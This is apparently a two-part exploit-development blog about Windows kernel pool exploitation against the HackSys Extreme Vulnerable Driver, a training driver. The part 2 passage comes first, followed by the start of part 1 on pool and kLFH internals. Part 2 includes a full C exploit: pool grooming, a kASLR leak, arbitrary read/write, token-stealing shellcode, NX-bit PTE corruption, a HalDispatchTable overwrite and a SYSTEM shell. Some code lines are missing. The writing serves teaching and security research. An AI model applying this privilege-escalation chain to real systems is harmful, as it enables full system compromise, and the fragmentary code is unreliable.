Leveraging the exact same method as before, we can see we have defeated page table randomization and have the base of the page table entries in hand!

The next step is to obtain the PTE bits that make up the shellcode page. We will eventually write our shellcode to KUSER_SHARED_DATA+0x800 in kernel mode, which is at a static address of 0xfffff87000000800. We can instrument the routine to obtain this information in C.

After running the updated exploit, we can see that we are able to leak the PTE bits for KUSER_SHARED_DATA+0x800, where our shellcode will eventually reside.

Note that the !pte extension in WinDbg was giving myself trouble. So, from the debuggee machine, I ran WinDbg β€œclassic” with local kernel debugging (lkd) to show the contents of !pte. Notice the actual virtual address for the PTE has changed, but the contents of the PTE bits are the same. This is due to myself rebooting the machine and kASLR kicking in. The WinDbg β€œclassic” screenshot is meant to just outline the PTE contents.

You can view this previous blog) from myself to understand the permissions KUSER_SHARED_DATA has, which is write but no execute. The last item we need is the contents of [nt!HalDispatchTable].

After executing the updated code, we can see we have preserved the value [nt!HalDispatchTable+0x8].

The last item on the agenda is the write primitive, which is 99 percent identical to the read primitive. After writing our shellcode to kernel mode and then corrupting the PTE of the shellcode page, we will be able to successfully escalate our privileges.

Arbitrary Write Primitive

Leveraging the same concepts from the arbitrary read primitive, we can also arbitrarily overwrite 64-bit pointers! Instead of using the β€œGet” operation in order to fetch the dereferenced contents of the Name value specified by the β€œcorrupted” ARW_HELPER_NON_PAGED_POOL_NX object, and then returning this value to the Name value specified by the β€œmain” object, this time we will set the Name value of the β€œmain” object not to a pointer that receives the contents, but to the value of what we would like to overwrite memory with. In this case, we want to set this value to the value of shellcode, and then set the Name value of the β€œcorrupted” object to KUSER_SHARED_DATA+0x800 incrementally.

From here we can run our updated exploit. Since we have created a loop to automate the writing process, we can see we are able to arbitrarily write the contents of the 9 QWORDS which make up our shellcode to KUSER_SHARED_DATA+0x800!

Awesome! We have now successfully performed the arbitrary write primitive! The next goal is to corrupt the contents of the PTE for the KUSER_SHARED_DATA+0x800 page.

From here we can use WinDbg classic to inspect the PTE before and after the write operation.

Awesome! Our exploit now just needs three more things:

  1. Corrupt [nt!HalDispatchTable+0x8] to point to KUSER_SHARED_DATA+0x800
  2. Invoke ntdll!NtQueryIntervalPRofile, which will perform the transition to kernel mode to invoke [nt!HalDispatchTable+0x8], thus executing our shellcode
  3. Restore [nt!HalDispatchTable+0x8] with the arbitrary write primitive

Let’s update our exploit code to perform step one.

After executing the updated code, we can see that we have successfully overwritten nt!HalDispatchTable+0x8 with the address of KUSER_SHARED_DATA+0x800 - which contains our shellcode!

Next, we can add the routing to dynamically resolve ntdll!NtQueryIntervalProfile, invoke it, and then restore [nt!HalDispatchTable+0x8]

The final result is a SYSTEM shell from low integrity!

β€œβ€¦Unless We Conquer, As Conquer We Must, As Conquer We Shall.”

Hopefully you, as the reader, found this two-part series on pool corruption useful! As aforementioned in the beginning of this post, we must expect mitigations such as VBS and HVCI to be enabled in the future. ROP is still a viable alternative in the kernel due to the lack of kernel CET (kCET) at the moment (although I am sure this is subject to change). As such, techniques such as the one outlined in this blog post will soon be deprecated, leaving us with fewer options for exploitation than which we started. Data-only attacks are always viable, and there have been more novel techniques mentioned, such as this tweet sent to myself by Dmytro, which talks about leveraging ROP to forge kernel function calls even with VBS/HVCI enabled. As the title of this last section of the blog articulates, where there is a will there is a way - and although the bar will be raised, this is only par for the course with exploit development over the past few years. KPP + VBS + HVCI + kCFG/kXFG + SMEP + DEP + kASLR + kCET and many other mitigations will prove very useful for blocking most exploits. I hope that researchers stay hungry and continue to push the limits with this mitigations to find more novel ways to keep exploit development alive!

Peace, love, and positivity :-).

Here is the final exploit code, which is also available on my GitHub:

// HackSysExtreme Vulnerable Driver: Pool Overflow + Memory Disclosure
// Author: Connor McGarr (@33y0re)

#include <windows.h>
#include <stdio.h>

// typdef an ARW_HELPER_OBJECT_IO struct
typedef struct _ARW_HELPER_OBJECT_IO
    PVOID HelperObjectAddress;
    PVOID Name;
    SIZE_T Length;

// Create a global array of ARW_HELPER_OBJECT_IO objects to manage the groomed pool allocations
ARW_HELPER_OBJECT_IO helperobjectArray[5000] = { 0 };

// Prepping call to nt!NtQueryIntervalProfile
typedef NTSTATUS(WINAPI* NtQueryIntervalProfile_t)(IN ULONG ProfileSource, OUT PULONG Interval);

// Leak the base of HEVD.sys
unsigned long long memLeak(HANDLE driverHandle)
    // Array to manage handles opened by CreateEventA
    HANDLE eventObjects[5000];

    // Spray 5000 objects to fill the new page
    for (int i = 0; i <= 5000; i++)
        // Create the objects
        HANDLE tempHandle = CreateEventA(

        // Assign the handles to the array
        eventObjects[i] = tempHandle;

    // Check to see if the first handle is a valid handle
    if (eventObjects[0] == NULL)
        printf("[-] Error! Unable to spray CreateEventA objects! Error: 0x%lx\n", GetLastError());

        return 0x1;
        printf("[+] Sprayed CreateEventA objects to fill holes of size 0x80!\n");

        // Close half of the handles
        for (int i = 0; i <= 5000; i += 2)
            BOOL tempHandle1 = CloseHandle(

            eventObjects[i] = NULL;

            // Error handling
            if (!tempHandle1)
                printf("[-] Error! Unable to free the CreateEventA objects! Error: 0x%lx\n", GetLastError());

                return 0x1;

        printf("[+] Poked holes in the new pool page!\n");

        // Allocate UaF Objects in place of the poked holes by just invoking the IOCTL, which will call ExAllocatePoolWithTag for a UAF object
        // kLFH should automatically fill the freed holes with the UAF objects
        DWORD bytesReturned;

        for (int i = 0; i < 2500; i++)

        printf("[+] Allocated objects containing a pointer to HEVD in place of the freed CreateEventA objects!\n");

        // Close the rest of the event objects
        for (int i = 1; i <= 5000; i += 2)
            BOOL tempHandle2 = CloseHandle(

            eventObjects[i] = NULL;

            // Error handling
            if (!tempHandle2)
                printf("[-] Error! Unable to free the rest of the CreateEventA objects! Error: 0x%lx\n", GetLastError());

                return 0x1;

        // Array to store the buffer (output buffer for DeviceIoControl) and the base address
        unsigned long long outputBuffer[100];
        unsigned long long hevdBase = 0;

        // Everything is now, theoretically, [FREE, UAFOBJ, FREE, UAFOBJ, FREE, UAFOBJ], barring any more randomization from the kLFH
        // Fill some of the holes, but not all, with vulnerable chunks that can read out-of-bounds (we don't want to fill up all the way to avoid reading from a page that isn't mapped)

        for (int i = 0; i <= 100; i++)
            // Return buffer
            DWORD bytesReturned1;



        printf("[+] Successfully triggered the out-of-bounds read!\n");

        // Parse the output
        for (int i = 0; i <= 100; i++)
            // Kernel mode address?
            if ((outputBuffer[i] & 0xfffff00000000000) == 0xfffff00000000000)
                printf("[+] Address of function pointer in HEVD.sys: 0x%llx\n", outputBuffer[i]);
                printf("[+] Base address of HEVD.sys: 0x%llx\n", outputBuffer[i] - 0x880CC);

                // Store the variable for future usage
                hevdBase = outputBuffer[i] - 0x880CC;

                // Return the value of the base of HEVD
                return hevdBase;

// Function used to fill the holes in pool pages
void fillHoles(HANDLE driverHandle)
    // Instantiate an ARW_HELPER_OBJECT_IO
    ARW_HELPER_OBJECT_IO tempObject = { 0 };

    // Value to assign the Name member of each ARW_HELPER_OBJECT_IO
    unsigned long long nameValue = 0x9090909090909090;

    // Set the length to 0x8 so that the Name member of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object allocated in the pool has its Name member allocated to size 0x8, a 64-bit pointer size
    tempObject.Length = 0x8;

    // Bytes returned
    DWORD bytesreturnedFill;

    for (int i = 0; i <= 5000; i++)
        // Set the Name value to 0x9090909090909090
        tempObject.Name = &nameValue;

        // Allocate a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object with a Name member of size 0x8 and a Name value of 0x9090909090909090

        // Using non-controlled arbitrary write to set the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object to 0x9090909090909090 via the Name member of each ARW_HELPER_OBJECT_IO
        // This will be used later on to filter out which ARW_HELPER_OBJECT_NON_PAGED_POOL_NX HAVE NOT been corrupted successfully (e.g. their Name member is 0x9090909090909090 still)

        // After allocating the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects (via the ARW_HELPER_OBJECT_IO objects), assign each ARW_HELPER_OBJECT_IO structures to the global managing array
        helperobjectArray[i] = tempObject;

    printf("[+] Sprayed ARW_HELPER_OBJECT_IO objects to fill holes in the NonPagedPoolNx with ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects!\n");

// Fill up the new page within the NonPagedPoolNx with ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects
void groomPool(HANDLE driverHandle)
    // Instantiate an ARW_HELPER_OBJECT_IO
    ARW_HELPER_OBJECT_IO tempObject1 = { 0 };

    // Value to assign the Name member of each ARW_HELPER_OBJECT_IO
    unsigned long long nameValue1 = 0x9090909090909090;

    // Set the length to 0x8 so that the Name member of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object allocated in the pool has its Name member allocated to size 0x8, a 64-bit pointer size
    tempObject1.Length = 0x8;

    // Bytes returned
    DWORD bytesreturnedGroom;

    for (int i = 0; i <= 5000; i++)
        // Set the Name value to 0x9090909090909090
        tempObject1.Name = &nameValue1;

        // Allocate a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object with a Name member of size 0x8 and a Name value of 0x9090909090909090

        // Using non-controlled arbitrary write to set the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object to 0x9090909090909090 via the Name member of each ARW_HELPER_OBJECT_IO
        // This will be used later on to filter out which ARW_HELPER_OBJECT_NON_PAGED_POOL_NX HAVE NOT been corrupted successfully (e.g. their Name member is 0x9090909090909090 still)

        // After allocating the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects (via the ARW_HELPER_OBJECT_IO objects), assign each ARW_HELPER_OBJECT_IO structures to the global managing array
        helperobjectArray[i] = tempObject1;

    printf("[+] Filled the new page with ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects!\n");

// Free every other object in the global array to poke holes for the vulnerable objects
void pokeHoles(HANDLE driverHandle)
    // Bytes returned
    DWORD bytesreturnedPoke;

    // Free every other element in the global array managing objects in the new page from grooming
    for (int i = 0; i <= 5000; i += 2)

    printf("[+] Poked holes in the NonPagedPoolNx page containing the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects!\n");

// Create the main ARW_HELPER_OBJECT_IO
ARW_HELPER_OBJECT_IO createmainObject(HANDLE driverHandle)
    // Instantiate an object of type ARW_HELPER_OBJECT_IO
    ARW_HELPER_OBJECT_IO helperObject = { 0 };

    // Set the Length member which corresponds to the amount of memory used to allocate a chunk to store the Name member eventually
    helperObject.Length = 0x8;

    // Bytes returned
    DWORD bytesReturned2;

    // Invoke CreateArbitraryReadWriteHelperObjectNonPagedPoolNx to create the main ARW_HELPER_OBJECT_NON_PAGED_POOL_NX

    // Parse the output
    printf("[+] PARW_HELPER_OBJECT_IO->HelperObjectAddress: 0x%p\n", helperObject.HelperObjectAddress);
    printf("[+] PARW_HELPER_OBJECT_IO->Name: 0x%p\n", helperObject.Name);
    printf("[+] PARW_HELPER_OBJECT_IO->Length: 0x%zu\n", helperObject.Length);

    return helperObject;

// Read/write primitive
void readwritePrimitive(HANDLE driverHandle)
    // Store the value of the base of HEVD
    unsigned long long hevdBase = memLeak(driverHandle);

    // Store the main ARW_HELOPER_OBJECT
    ARW_HELPER_OBJECT_IO mainObject = createmainObject(driverHandle);

    // Fill the holes

    // Groom the pool

    // Poke holes

    // Use buffer overflow to take "main" ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object's Name value (managed by ARW_HELPER_OBJECT_IO.Name) to overwrite any of the groomed ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name values
    // Create a buffer that first fills up the vulnerable chunk of 0x10 (16) bytes
    unsigned long long vulnBuffer[5];
    vulnBuffer[0] = 0x4141414141414141;
    vulnBuffer[1] = 0x4141414141414141;

    // Hardcode the _POOL_HEADER value for a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object
    vulnBuffer[2] = 0x6b63614802020000;

    // Padding
    vulnBuffer[3] = 0x4141414141414141;

    // Overwrite any of the adjacent ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object's Name member with the address of the "main" ARW_HELPER_OBJECT_NON_PAGED_POOL_NX (via ARW_HELPER_OBJECT_IO.HelperObjectAddress)
    vulnBuffer[4] = mainObject.HelperObjectAddress;

    // Bytes returned
    DWORD bytesreturnedOverflow;
    DWORD bytesreturnedreadPrimtitve;

    printf("[+] Triggering the out-of-bounds-write via pool overflow!\n");

    // Trigger the pool overflow

    // Find which "groomed" object was overflowed
    int index = 0;
    unsigned long long placeholder = 0x9090909090909090;

    // Loop through every groomed object to find out which Name member was overwritten with the main ARW_HELPER_NON_PAGED_POOL_NX object
    for (int i = 0; i <= 5000; i++)
        // The placeholder variable will be overwritten. Get operation will overwrite this variable with the real contents of each object's Name member
        helperobjectArray[i].Name = &placeholder;


        // Loop until a Name value other than the original NOPs is found
        if (placeholder != 0x9090909090909090)
            printf("[+] Found the overflowed object overwritten with main ARW_HELPER_NON_PAGED_POOL_NX object!\n");
            printf("[+] PARW_HELPER_OBJECT_IO->HelperObjectAddress: 0x%p\n", helperobjectArray[i].HelperObjectAddress);

            // Assign the index
            index = i;

            printf("[+] Array index of global array managing groomed objects: %d\n", index);

            // Break the loop

    // IAT entry from HEVD.sys which points to nt!ExAllocatePoolWithTag
    unsigned long long ntiatLeak = hevdBase + 0x2038;

    // Print update
    printf("[+] Target HEVD.sys address with pointer to ntoskrnl.exe: 0x%llx\n", ntiatLeak);

    // Assign the target address to the corrupted object
    helperobjectArray[index].Name = &ntiatLeak;

    // Set the Name member of the "corrupted" object managed by the global array. The main object is currently set to the Name member of one of the sprayed ARW_HELPER_OBJECT_NON_PAGED_POOL_NX that was corrupted via the pool overflow

    // Declare variable that will receive the address of nt!ExAllocatePoolWithTag and initialize it
    unsigned long long ntPointer = 0x9090909090909090;

    // Setting the Name member of the main object to the address of the ntPointer variable. When the Name member is dereferenced and bubbled back up to user mode, it will overwrite the value of ntPointer
    mainObject.Name = &ntPointer;

    // Perform the "Get" operation on the main object, which should now have the Name member set to the IAT entry from HEVD

    // Print the pointer to nt!ExAllocatePoolWithTag
    printf("[+] Leaked ntoskrnl.exe pointer! nt!ExAllocatePoolWithTag: 0x%llx\n", ntPointer);

    // Assign a variable the base of the kernel (static offset)
    unsigned long long kernelBase = ntPointer - 0x9b3160;

    // Print the base of the kernel
    printf("[+] ntoskrnl.exe base address: 0x%llx\n", kernelBase);

    // Assign a variable with nt!MiGetPteAddress+0x13
    unsigned long long migetpteAddress = kernelBase + 0x222073;

    // Print update
    printf("[+] nt!MiGetPteAddress+0x13: 0x%llx\n", migetpteAddress);

    // Assign the target address to the corrupted object
    helperobjectArray[index].Name = &migetpteAddress;

    // Set the Name member of the "corrupted" object managed by the global array to obtain the base of the PTEs

    // Declare a variable that will receive the base of the PTEs
    unsigned long long pteBase = 0x9090909090909090;

    // Setting the Name member of the main object to the address of the pteBase variable
    mainObject.Name = &pteBase;

    // Perform the "Get" operation on the main object

    // Print update
    printf("[+] Base of the page table entries: 0x%llx\n", pteBase);

    // Calculate the PTE page for our shellcode in KUSER_SHARED_DATA
    unsigned long long shellcodePte = 0xfffff78000000800 >> 9;
    shellcodePte = shellcodePte & 0x7FFFFFFFF8;
    shellcodePte = shellcodePte + pteBase;

    // Print update
    printf("[+] KUSER_SHARED_DATA+0x800 PTE page: 0x%llx\n", shellcodePte);

    // Assign the target address to the corrupted object
    helperobjectArray[index].Name = &shellcodePte;

    // Set the Name member of the "corrupted" object managed by the global array to obtain the address of the shellcode PTE page

    // Declare a variable that will receive the PTE bits
    unsigned long long pteBits = 0x9090909090909090;

    // Setting the Name member of the main object
    mainObject.Name = &pteBits;

    // Perform the "Get" operation on the main object

    // Print update
    printf("[+] PTE bits for shellcode page: %p\n", pteBits);

    // Store nt!HalDispatchTable+0x8
    unsigned long long halTemp = kernelBase + 0xc00a68;

    // Assign the target address to the corrupted object
    helperobjectArray[index].Name = &halTemp;

    // Set the Name member of the "corrupted" object managed by the global array to obtain the pointer at nt!HalDispatchTable+0x8

    // Declare a variable that will receive [nt!HalDispatchTable+0x8]
    unsigned long long halDispatch = 0x9090909090909090;

    // Setting the Name member of the main object
    mainObject.Name = &halDispatch;

    // Perform the "Get" operation on the main object

    // Print update
    printf("[+] Preserved [nt!HalDispatchTable+0x8] value: 0x%llx\n", halDispatch);

    // Arbitrary write primitive

        ; Windows 10 19H1 x64 Token Stealing Payload
        ; Author Connor McGarr
        [BITS 64]
            mov rax, [gs:0x188]       ; Current thread (_KTHREAD)
            mov rax, [rax + 0xb8]     ; Current process (_EPROCESS)
            mov rbx, rax              ; Copy current process (_EPROCESS) to rbx
            mov rbx, [rbx + 0x448]    ; ActiveProcessLinks
            sub rbx, 0x448            ; Go back to current process (_EPROCESS)
            mov rcx, [rbx + 0x440]    ; UniqueProcessId (PID)
            cmp rcx, 4                ; Compare PID to SYSTEM PID
            jnz __loop                ; Loop until SYSTEM PID is found
            mov rcx, [rbx + 0x4b8]    ; SYSTEM token is @ offset _EPROCESS + 0x360
            and cl, 0xf0              ; Clear out _EX_FAST_REF RefCnt
            mov [rax + 0x4b8], rcx    ; Copy SYSTEM token to current process
            xor rax, rax              ; set NTSTATUS STATUS_SUCCESS
            ret                       ; Done!

    // Shellcode
    unsigned long long shellcode[9] = { 0 };
    shellcode[0] = 0x00018825048B4865;
    shellcode[1] = 0x000000B8808B4800;
    shellcode[2] = 0x04489B8B48C38948;
    shellcode[3] = 0x000448EB81480000;
    shellcode[4] = 0x000004408B8B4800;
    shellcode[5] = 0x8B48E57504F98348;
    shellcode[6] = 0xF0E180000004B88B;
    shellcode[7] = 0x48000004B8888948;
    shellcode[8] = 0x0000000000C3C031;

    // Assign the target address to write to the corrupted object
    unsigned long long kusersharedData = 0xfffff78000000800;

    // Create a "counter" for writing the array of shellcode
    int counter = 0;

    // For loop to write the shellcode
    for (int i = 0; i <= 9; i++)
        // Setting the corrupted object to KUSER_SHARED_DATA+0x800 incrementally 9 times, since our shellcode is 9 QWORDS
        // kusersharedData variable, managing the current address of KUSER_SHARED_DATA+0x800, is incremented by 0x8 at the end of each iteration of the loop
        helperobjectArray[index].Name = &kusersharedData;

        // Setting the Name member of the main object to specify what we would like to write
        mainObject.Name = &shellcode[counter];

        // Set the Name member of the "corrupted" object managed by the global array to KUSER_SHARED_DATA+0x800, incrementally

        // Perform the arbitrary write via "set" to overwrite each QWORD of KUSER_SHARED_DATA+0x800 until our shellcode is written

        // Increase the counter

        // Increase the counter
        kusersharedData += 0x8;

    // Print update
    printf("[+] Successfully wrote the shellcode to KUSER_SHARED_DATA+0x800!\n");

    // Taint the PTE contents to corrupt the NX bit in KUSER_SHARED_DATA+0x800
    unsigned long long taintedBits = pteBits & 0x0FFFFFFFFFFFFFFF;

    // Print update
    printf("[+] Tainted PTE contents: %p\n", taintedBits);

    // Leverage the arbitrary write primitive to corrupt the PTE contents

    // Setting the Name member of the corrupted object to specify where we would like to write
    helperobjectArray[index].Name = &shellcodePte;

    // Specify what we would like to write (the tainted PTE contents)
    mainObject.Name = &taintedBits;

    // Set the Name member of the "corrupted" object managed by the global array to KUSER_SHARED_DATA+0x800's PTE virtual address

    // Perform the arbitrary write

    // Print update
    printf("[+] Successfully corrupted the PTE of KUSER_SHARED_DATA+0x800! This region should now be marked as RWX!\n");

    // Leverage the arbitrary write primitive to overwrite nt!HalDispatchTable+0x8

    // Reset kusersharedData
    kusersharedData = 0xfffff78000000800;

    // Setting the Name member of the corrupted object to specify where we would like to write
    helperobjectArray[index].Name = &halTemp;

    // Specify where we would like to write (the address of KUSER_SHARED_DATA+0x800)
    mainObject.Name = &kusersharedData;

    // Set the Name member of the "corrupted" object managed by the global array to nt!HalDispatchTable+0x8

    // Perform the arbitrary write

    // Print update
    printf("[+] Successfully corrupted [nt!HalDispatchTable+0x8]!\n");

    // Locating nt!NtQueryIntervalProfile
    NtQueryIntervalProfile_t NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(

    // Error handling
    if (!NtQueryIntervalProfile)
        printf("[-] Error! Unable to find ntdll!NtQueryIntervalProfile! Error: %d\n", GetLastError());

    // Print update for found ntdll!NtQueryIntervalProfile
    printf("[+] Located ntdll!NtQueryIntervalProfile at: 0x%llx\n", NtQueryIntervalProfile);

    // Calling nt!NtQueryIntervalProfile
    ULONG exploit = 0;

    // Print update
    printf("[+] Successfully executed the shellcode!\n");

    // Leverage arbitrary write for restoration purposes

    // Setting the Name member of the corrupted object to specify where we would like to write
    helperobjectArray[index].Name = &halTemp;

    // Specify where we would like to write (the address of the preserved value at [nt!HalDispatchTable+0x8])
    mainObject.Name = &halDispatch;

    // Set the Name member of the "corrupted" object managed by the global array to nt!HalDispatchTable+0x8

    // Perform the arbitrary write

    // Print update
    printf("[+] Successfully restored [nt!HalDispatchTable+0x8]!\n");

    // Print update for NT AUTHORITY\SYSTEM shell
    printf("[+] Enjoy the NT AUTHORITY\\SYSTEM shell!\n");

    // Spawning an NT AUTHORITY\SYSTEM shell
    system("cmd.exe /c cmd.exe /K cd C:\\");

void main(void)
    // Open a handle to the driver
    printf("[+] Obtaining handle to HEVD.sys...\n");

    HANDLE drvHandle = CreateFileA(

    // Error handling
    if (drvHandle == (HANDLE)-1)
        printf("[-] Error! Unable to open a handle to the driver. Error: 0x%lx\n", GetLastError());

Exploit Development: Swimming In The (Kernel) Pool - Leveraging Pool Vulnerabilities From Low-Integrity Exploits, Part 1

7 June 2021 at 00:00


I am writing this blog as I am finishing up an amazing training from HackSys Team. This training finally demystified the pool on Windows for myself - something that I have always shied away from. During the training I picked up a lot of pointers (pun fully intended) on everything from an introduction to the kernel low fragmentation heap (kLFH) to pool grooming. As I use blogging as a mechanism for myself to not only share what I know, but to reinforce concepts by writing about them, I wanted to leverage the HackSys Extreme Vulnerable Driver and the win10-klfh branch (HEVD) to chain together two vulnerabilities in the driver from a low-integrity process - an out-of-bounds read and a pool overflow to achieve an arbitrary read/write primitive. This blog, part 1 of this series, will outline the out-of-bounds read and kASLR bypass from low integrity.

Low integrity processes and AppContainer protected processes, such as a browser sandbox, prevent Windows API calls such as EnumDeviceDrivers and NtQuerySystemInformation, which are commonly leveraged to retrieve the base address for ntoskrnl.exe and/or other drivers for kernel exploitation. This stipulation requires a generic kASLR bypass, as was common in the RS2 build of Windows via GDI objects, or some type of vulnerability. With generic kASLR bypasses now not only being very scarce and far-and-few between, information leaks, such as an out-of-bounds read, are the de-facto standard for bypassing kASLR from something like a browser sandbox.

This blog will touch on the basic internals of the pool on Windows, which is already heavily documented much better than any attempt I can make, the implications of the kFLH, from an exploit development perspective, and leveraging out-of-bounds read vulnerabilities.

Windows Pool Internals - tl;dr Version

This section will cover a bit about some pre-segment heap internals as well as how the segment heap works after 19H1. First, Windows exposes the API ExAllocatePoolWithTag, the main API used for pool allocations, which kernel mode drivers can allocate dynamic memory from, such as malloc from user mode. However, drivers targeting Windows 10 2004 or later, according to Microsoft, must use ExAllocatePool2 instead ofExAllocatePoolWithTag, which has apparently been deprecated. For the purposes of this blog we will just refer to the β€œmain allocation function” as ExAllocatePoolWithTag. One word about the β€œnew” APIs is that they will initialize allocate pool chunks to zero.

Continuing on, ExAllocatePoolWithTag’s prototype can be seen below.

The first parameter of this function is POOL_TYPE, which is of type enumeration, that specifies the type of memory to allocate. These values can be seen below.

Although there are many different types of allocations, notice how all of them, for the most part, are prefaced with NonPagedPool or PagedPool. This is because, on Windows, pool allocations come from these two pools (or they come from the session pool, which is beyond the scope of this post and is leveraged by win32k.sys). In user mode, developers have the default process heap to allocate chunks from or they can create their own private heaps as well. The Windows pool works a little different, as the system predefines two pools (for our purposes) of memory for servicing requests in the kernel. Recall also that allocations in the paged pool can be paged out of memory. Allocations in the non-paged pool will always be paged in memory. This basically means memory in the NonPagedPool/NonPagedPoolNx is always accessible. This caveat also means that the non-paged pool is a more β€œexpensive” resource and should be used accordingly.

As far as pool chunks go, the terminology is pretty much on point with a heap chunk, which I talked about in a previous blog on browser exploitation. Each pool chunk is prepended with a 0x10 byte _POOL_HEADER structure on 64-bit system, which can be found using WinDbg.

This structure contains metadata about the in-scope chunk. One interesting thing to note is that when a _POOL_HEADER structure is freed and it isn’t a valid header, a system crash will occur.

The ProcessBilled member of this structure is a pointer to the _EPROCESS object which made the allocation, but only if PoolQuota was set in the PoolType parameter of ExAllocatePoolWithTag. Notice that at an offset of 0x8 in this structure there is a union member, as it is clean two members reside at offset 0x8.

As a test, let’s set a breakpoint on nt!ExAllocatePoolWithTag. Since the Windows kernel will constantly call this function, we don’t need to create a driver that calls this function, as the system will already do this.

After setting a breakpoint, we can execute the function and examine the return value, which is the pool chunk that is allocated.

Notice how the ProcessBilled member isn’t a valid pointer to an _EPROCESS object. This is because this is a vanilla call to nt!ExAllocatePoolWithTag, without any scheduling quota madness going on, meaning the ProcessBilled member isn’t set. Since the AllocatorBackTraceIndex and PoolTagHash are obviously stored in a union, based on the fact that both the ProcessBilled and AllocatorBackTraceIndex members are at the same offset in memory, the two members AllocatorBackTraceIndex and PoolTagHash are actually β€œcarried over” into the ProcessBilled member. This won’t affect anything, since the ProcessBilled member isn’t accounted for due to the fact that PoolQuota wasn’t set in the PoolType parameter, and this is how WinDbg interprets the memory layout. If the PoolQuota was set, the EPROCESS pointer is actually XOR’d with a random β€œcookie”, meaning that if you wanted to reconstruct this header you would need to first leak the cookie. This information will be useful later on in the pool overflow vulnerability in part 2, which will not leverage PoolQuota.

Let’s now talk about the segment heap. The segment heap, which was already instrumented in user mode, was implemented into the Windows kernel with the 19H1 build of Windows 10. The β€œgist” of the segment heap is this: when a component in the kernel requests some dynamic memory, via on the the previously mentioned API calls, there are now a few options, namely four of them, that can service the request. The are:

  1. Low Fragmentation Heap (kLFH)
  2. Variable Size (VS)
  3. Segment Alloc
  4. Large Alloc

Each pool is now managed by a _SEGMENT_HEAP structure, as seen below, which provides references to various β€œsegments” in use for the pool and contains metadata for the pool.

The vulnerabilities mentioned in this blog post will be revolving around the kLFH, so for the purposes of this post I highly recommend reading this paper to find out more about the internals of each allocator and to view Yarden Shafir’s upcoming BlackHat talk on pool internals in the age of the segment heap!

For the purposes of this exploit and as a general note, let’s talk about how the _POOL_HEADER structure is used.

We talked about the _POOL_HEADER structure earlier - but let’s dig a big deeper into that concept to see if/when it is even used when the segment heap is enabled.

Any size allocation that cannot fit into a Variable Size segment allocation will pretty much end up in the kLFH. What is interesting here is that the _POOL_HEADER structure is no longer used for chunks within the VS segment. Chunks allocated using the VS segment are actually preceded prefaces with a header structure called _HEAP_VS_CHUNK_HEADER, which was pointed out to me by my co-worker Yarden Shafir. This structure can be seen in WinDbg.

The interesting fact about the pool headers with the segment heap is that the kLFH, which will be the target for this post, actually still use _POOL_HEADER structures to preface pool chunks.

Chunks allocated by the kLFH and VS segments are are shown below.

Why does this matter? For the purposes of exploitation in part 2, there will be a pool overflow at some point during exploitation. Since we know that pool chunks are prefaced with a header, and because we know that an invalid header will cause a crash, we need to be mindful of this. Using our overflow, we will need to make sure that a valid header is present during exploitation. Since our exploit will be targeting the kLFH, which still uses the standard _POOL_HEADER structure with no encoding, this will prove to be rather trivial later. _HEAP_VS_CHUNK_HEADER, however, performs additional encoding on its members.

The β€œlast piece of this puzzle” is to understand how we can force the system to allocate pool chunks via the kLFH segment. The kLFH services requests that range in size from 1 byte to 16,368 bytes. The kLFH segment is also managed by the _HEAP_LFH_CONTEXT structure, which can be dumped in WinDbg.

The kLFH has β€œbuckets” for each allocation size. The tl;dr here is if you want to trigger the kLFH you need to make 16 consecutive requests to the same size bucket. There are 129 buckets, and each bucket has a β€œgranularity”. Let’s look at a chart to see the determining factors in where an allocation resides in the kLFH, based on size, which was taken from the previously mentioned paper from Corentin and Paul.

This means that any allocation that is a 16 byte granularity (e.g. 1-16 bytes, 17-31 bytes, etc.) up until a 64 byte granularity are placed into buckets 1-64, starting with bucket 1 for allocations of 1-16 bytes, bucket 2 for 17-31 bytes, and so on, up until a 512 byte granularity. Anything larger is either serviced by the VS segment or other various components of the segment heap.

Let’s say we perform a pool spray of objects which are 0x40 bytes and we do this 100 times. We can expect that most of these allocations will get stored in the kLFH, due to the heuristics of 16 consecutive allocations and because the size matches one of the buckets provided by kLFH. This is very useful for exploitation, as it means there is a good chance we can groom the pool with relatively well. Grooming refers to the fact we can get a lot of pool chunks, which we control, lined up adjacently next to each other in order to make exploitation reliable. For example, if we can groom the pool with objects we control, one after the other, we can ensure that a pool overflow will overflow data which we control, leading to exploitation. We will touch a lot more on this in the future.

kLFH also uses these predetermined buckets to manage chunks. This also removes something known as coalescing, which is when the pool manager combines multiple free chunks into a bigger chunk for performance. Now, with the kLFH, because of the architecture, we know that if we free an object in the kLFH, we can expect that the free will remain until it is used again in an allocation for that specific sized chunk! For example, if we are working in bucket 1, which can hold anything from 1 byte to 1008 bytes, and we allocate two objects of the size 1008 bytes and then we free these objects, the pool manager will not combine these slots because that would result in a free chunk of 2016 bytes, which doesn’t fit into the bucket, which can only hold 1-1008 bytes. This means the kLFH will keep these slots free until the next allocation of this size comes in and uses it. This also will be useful later on.

However, what are the drawbacks to the kLFH? Since the kLFH uses predetermined sizes we need to be very luck to have a driver allocate objects which are of the same size as a vulnerable object which can be overflowed or manipulated. Let’s say we can perform a pool overflow into an adjacent chunk as such, in this expertly crafted Microsoft Paint diagram.

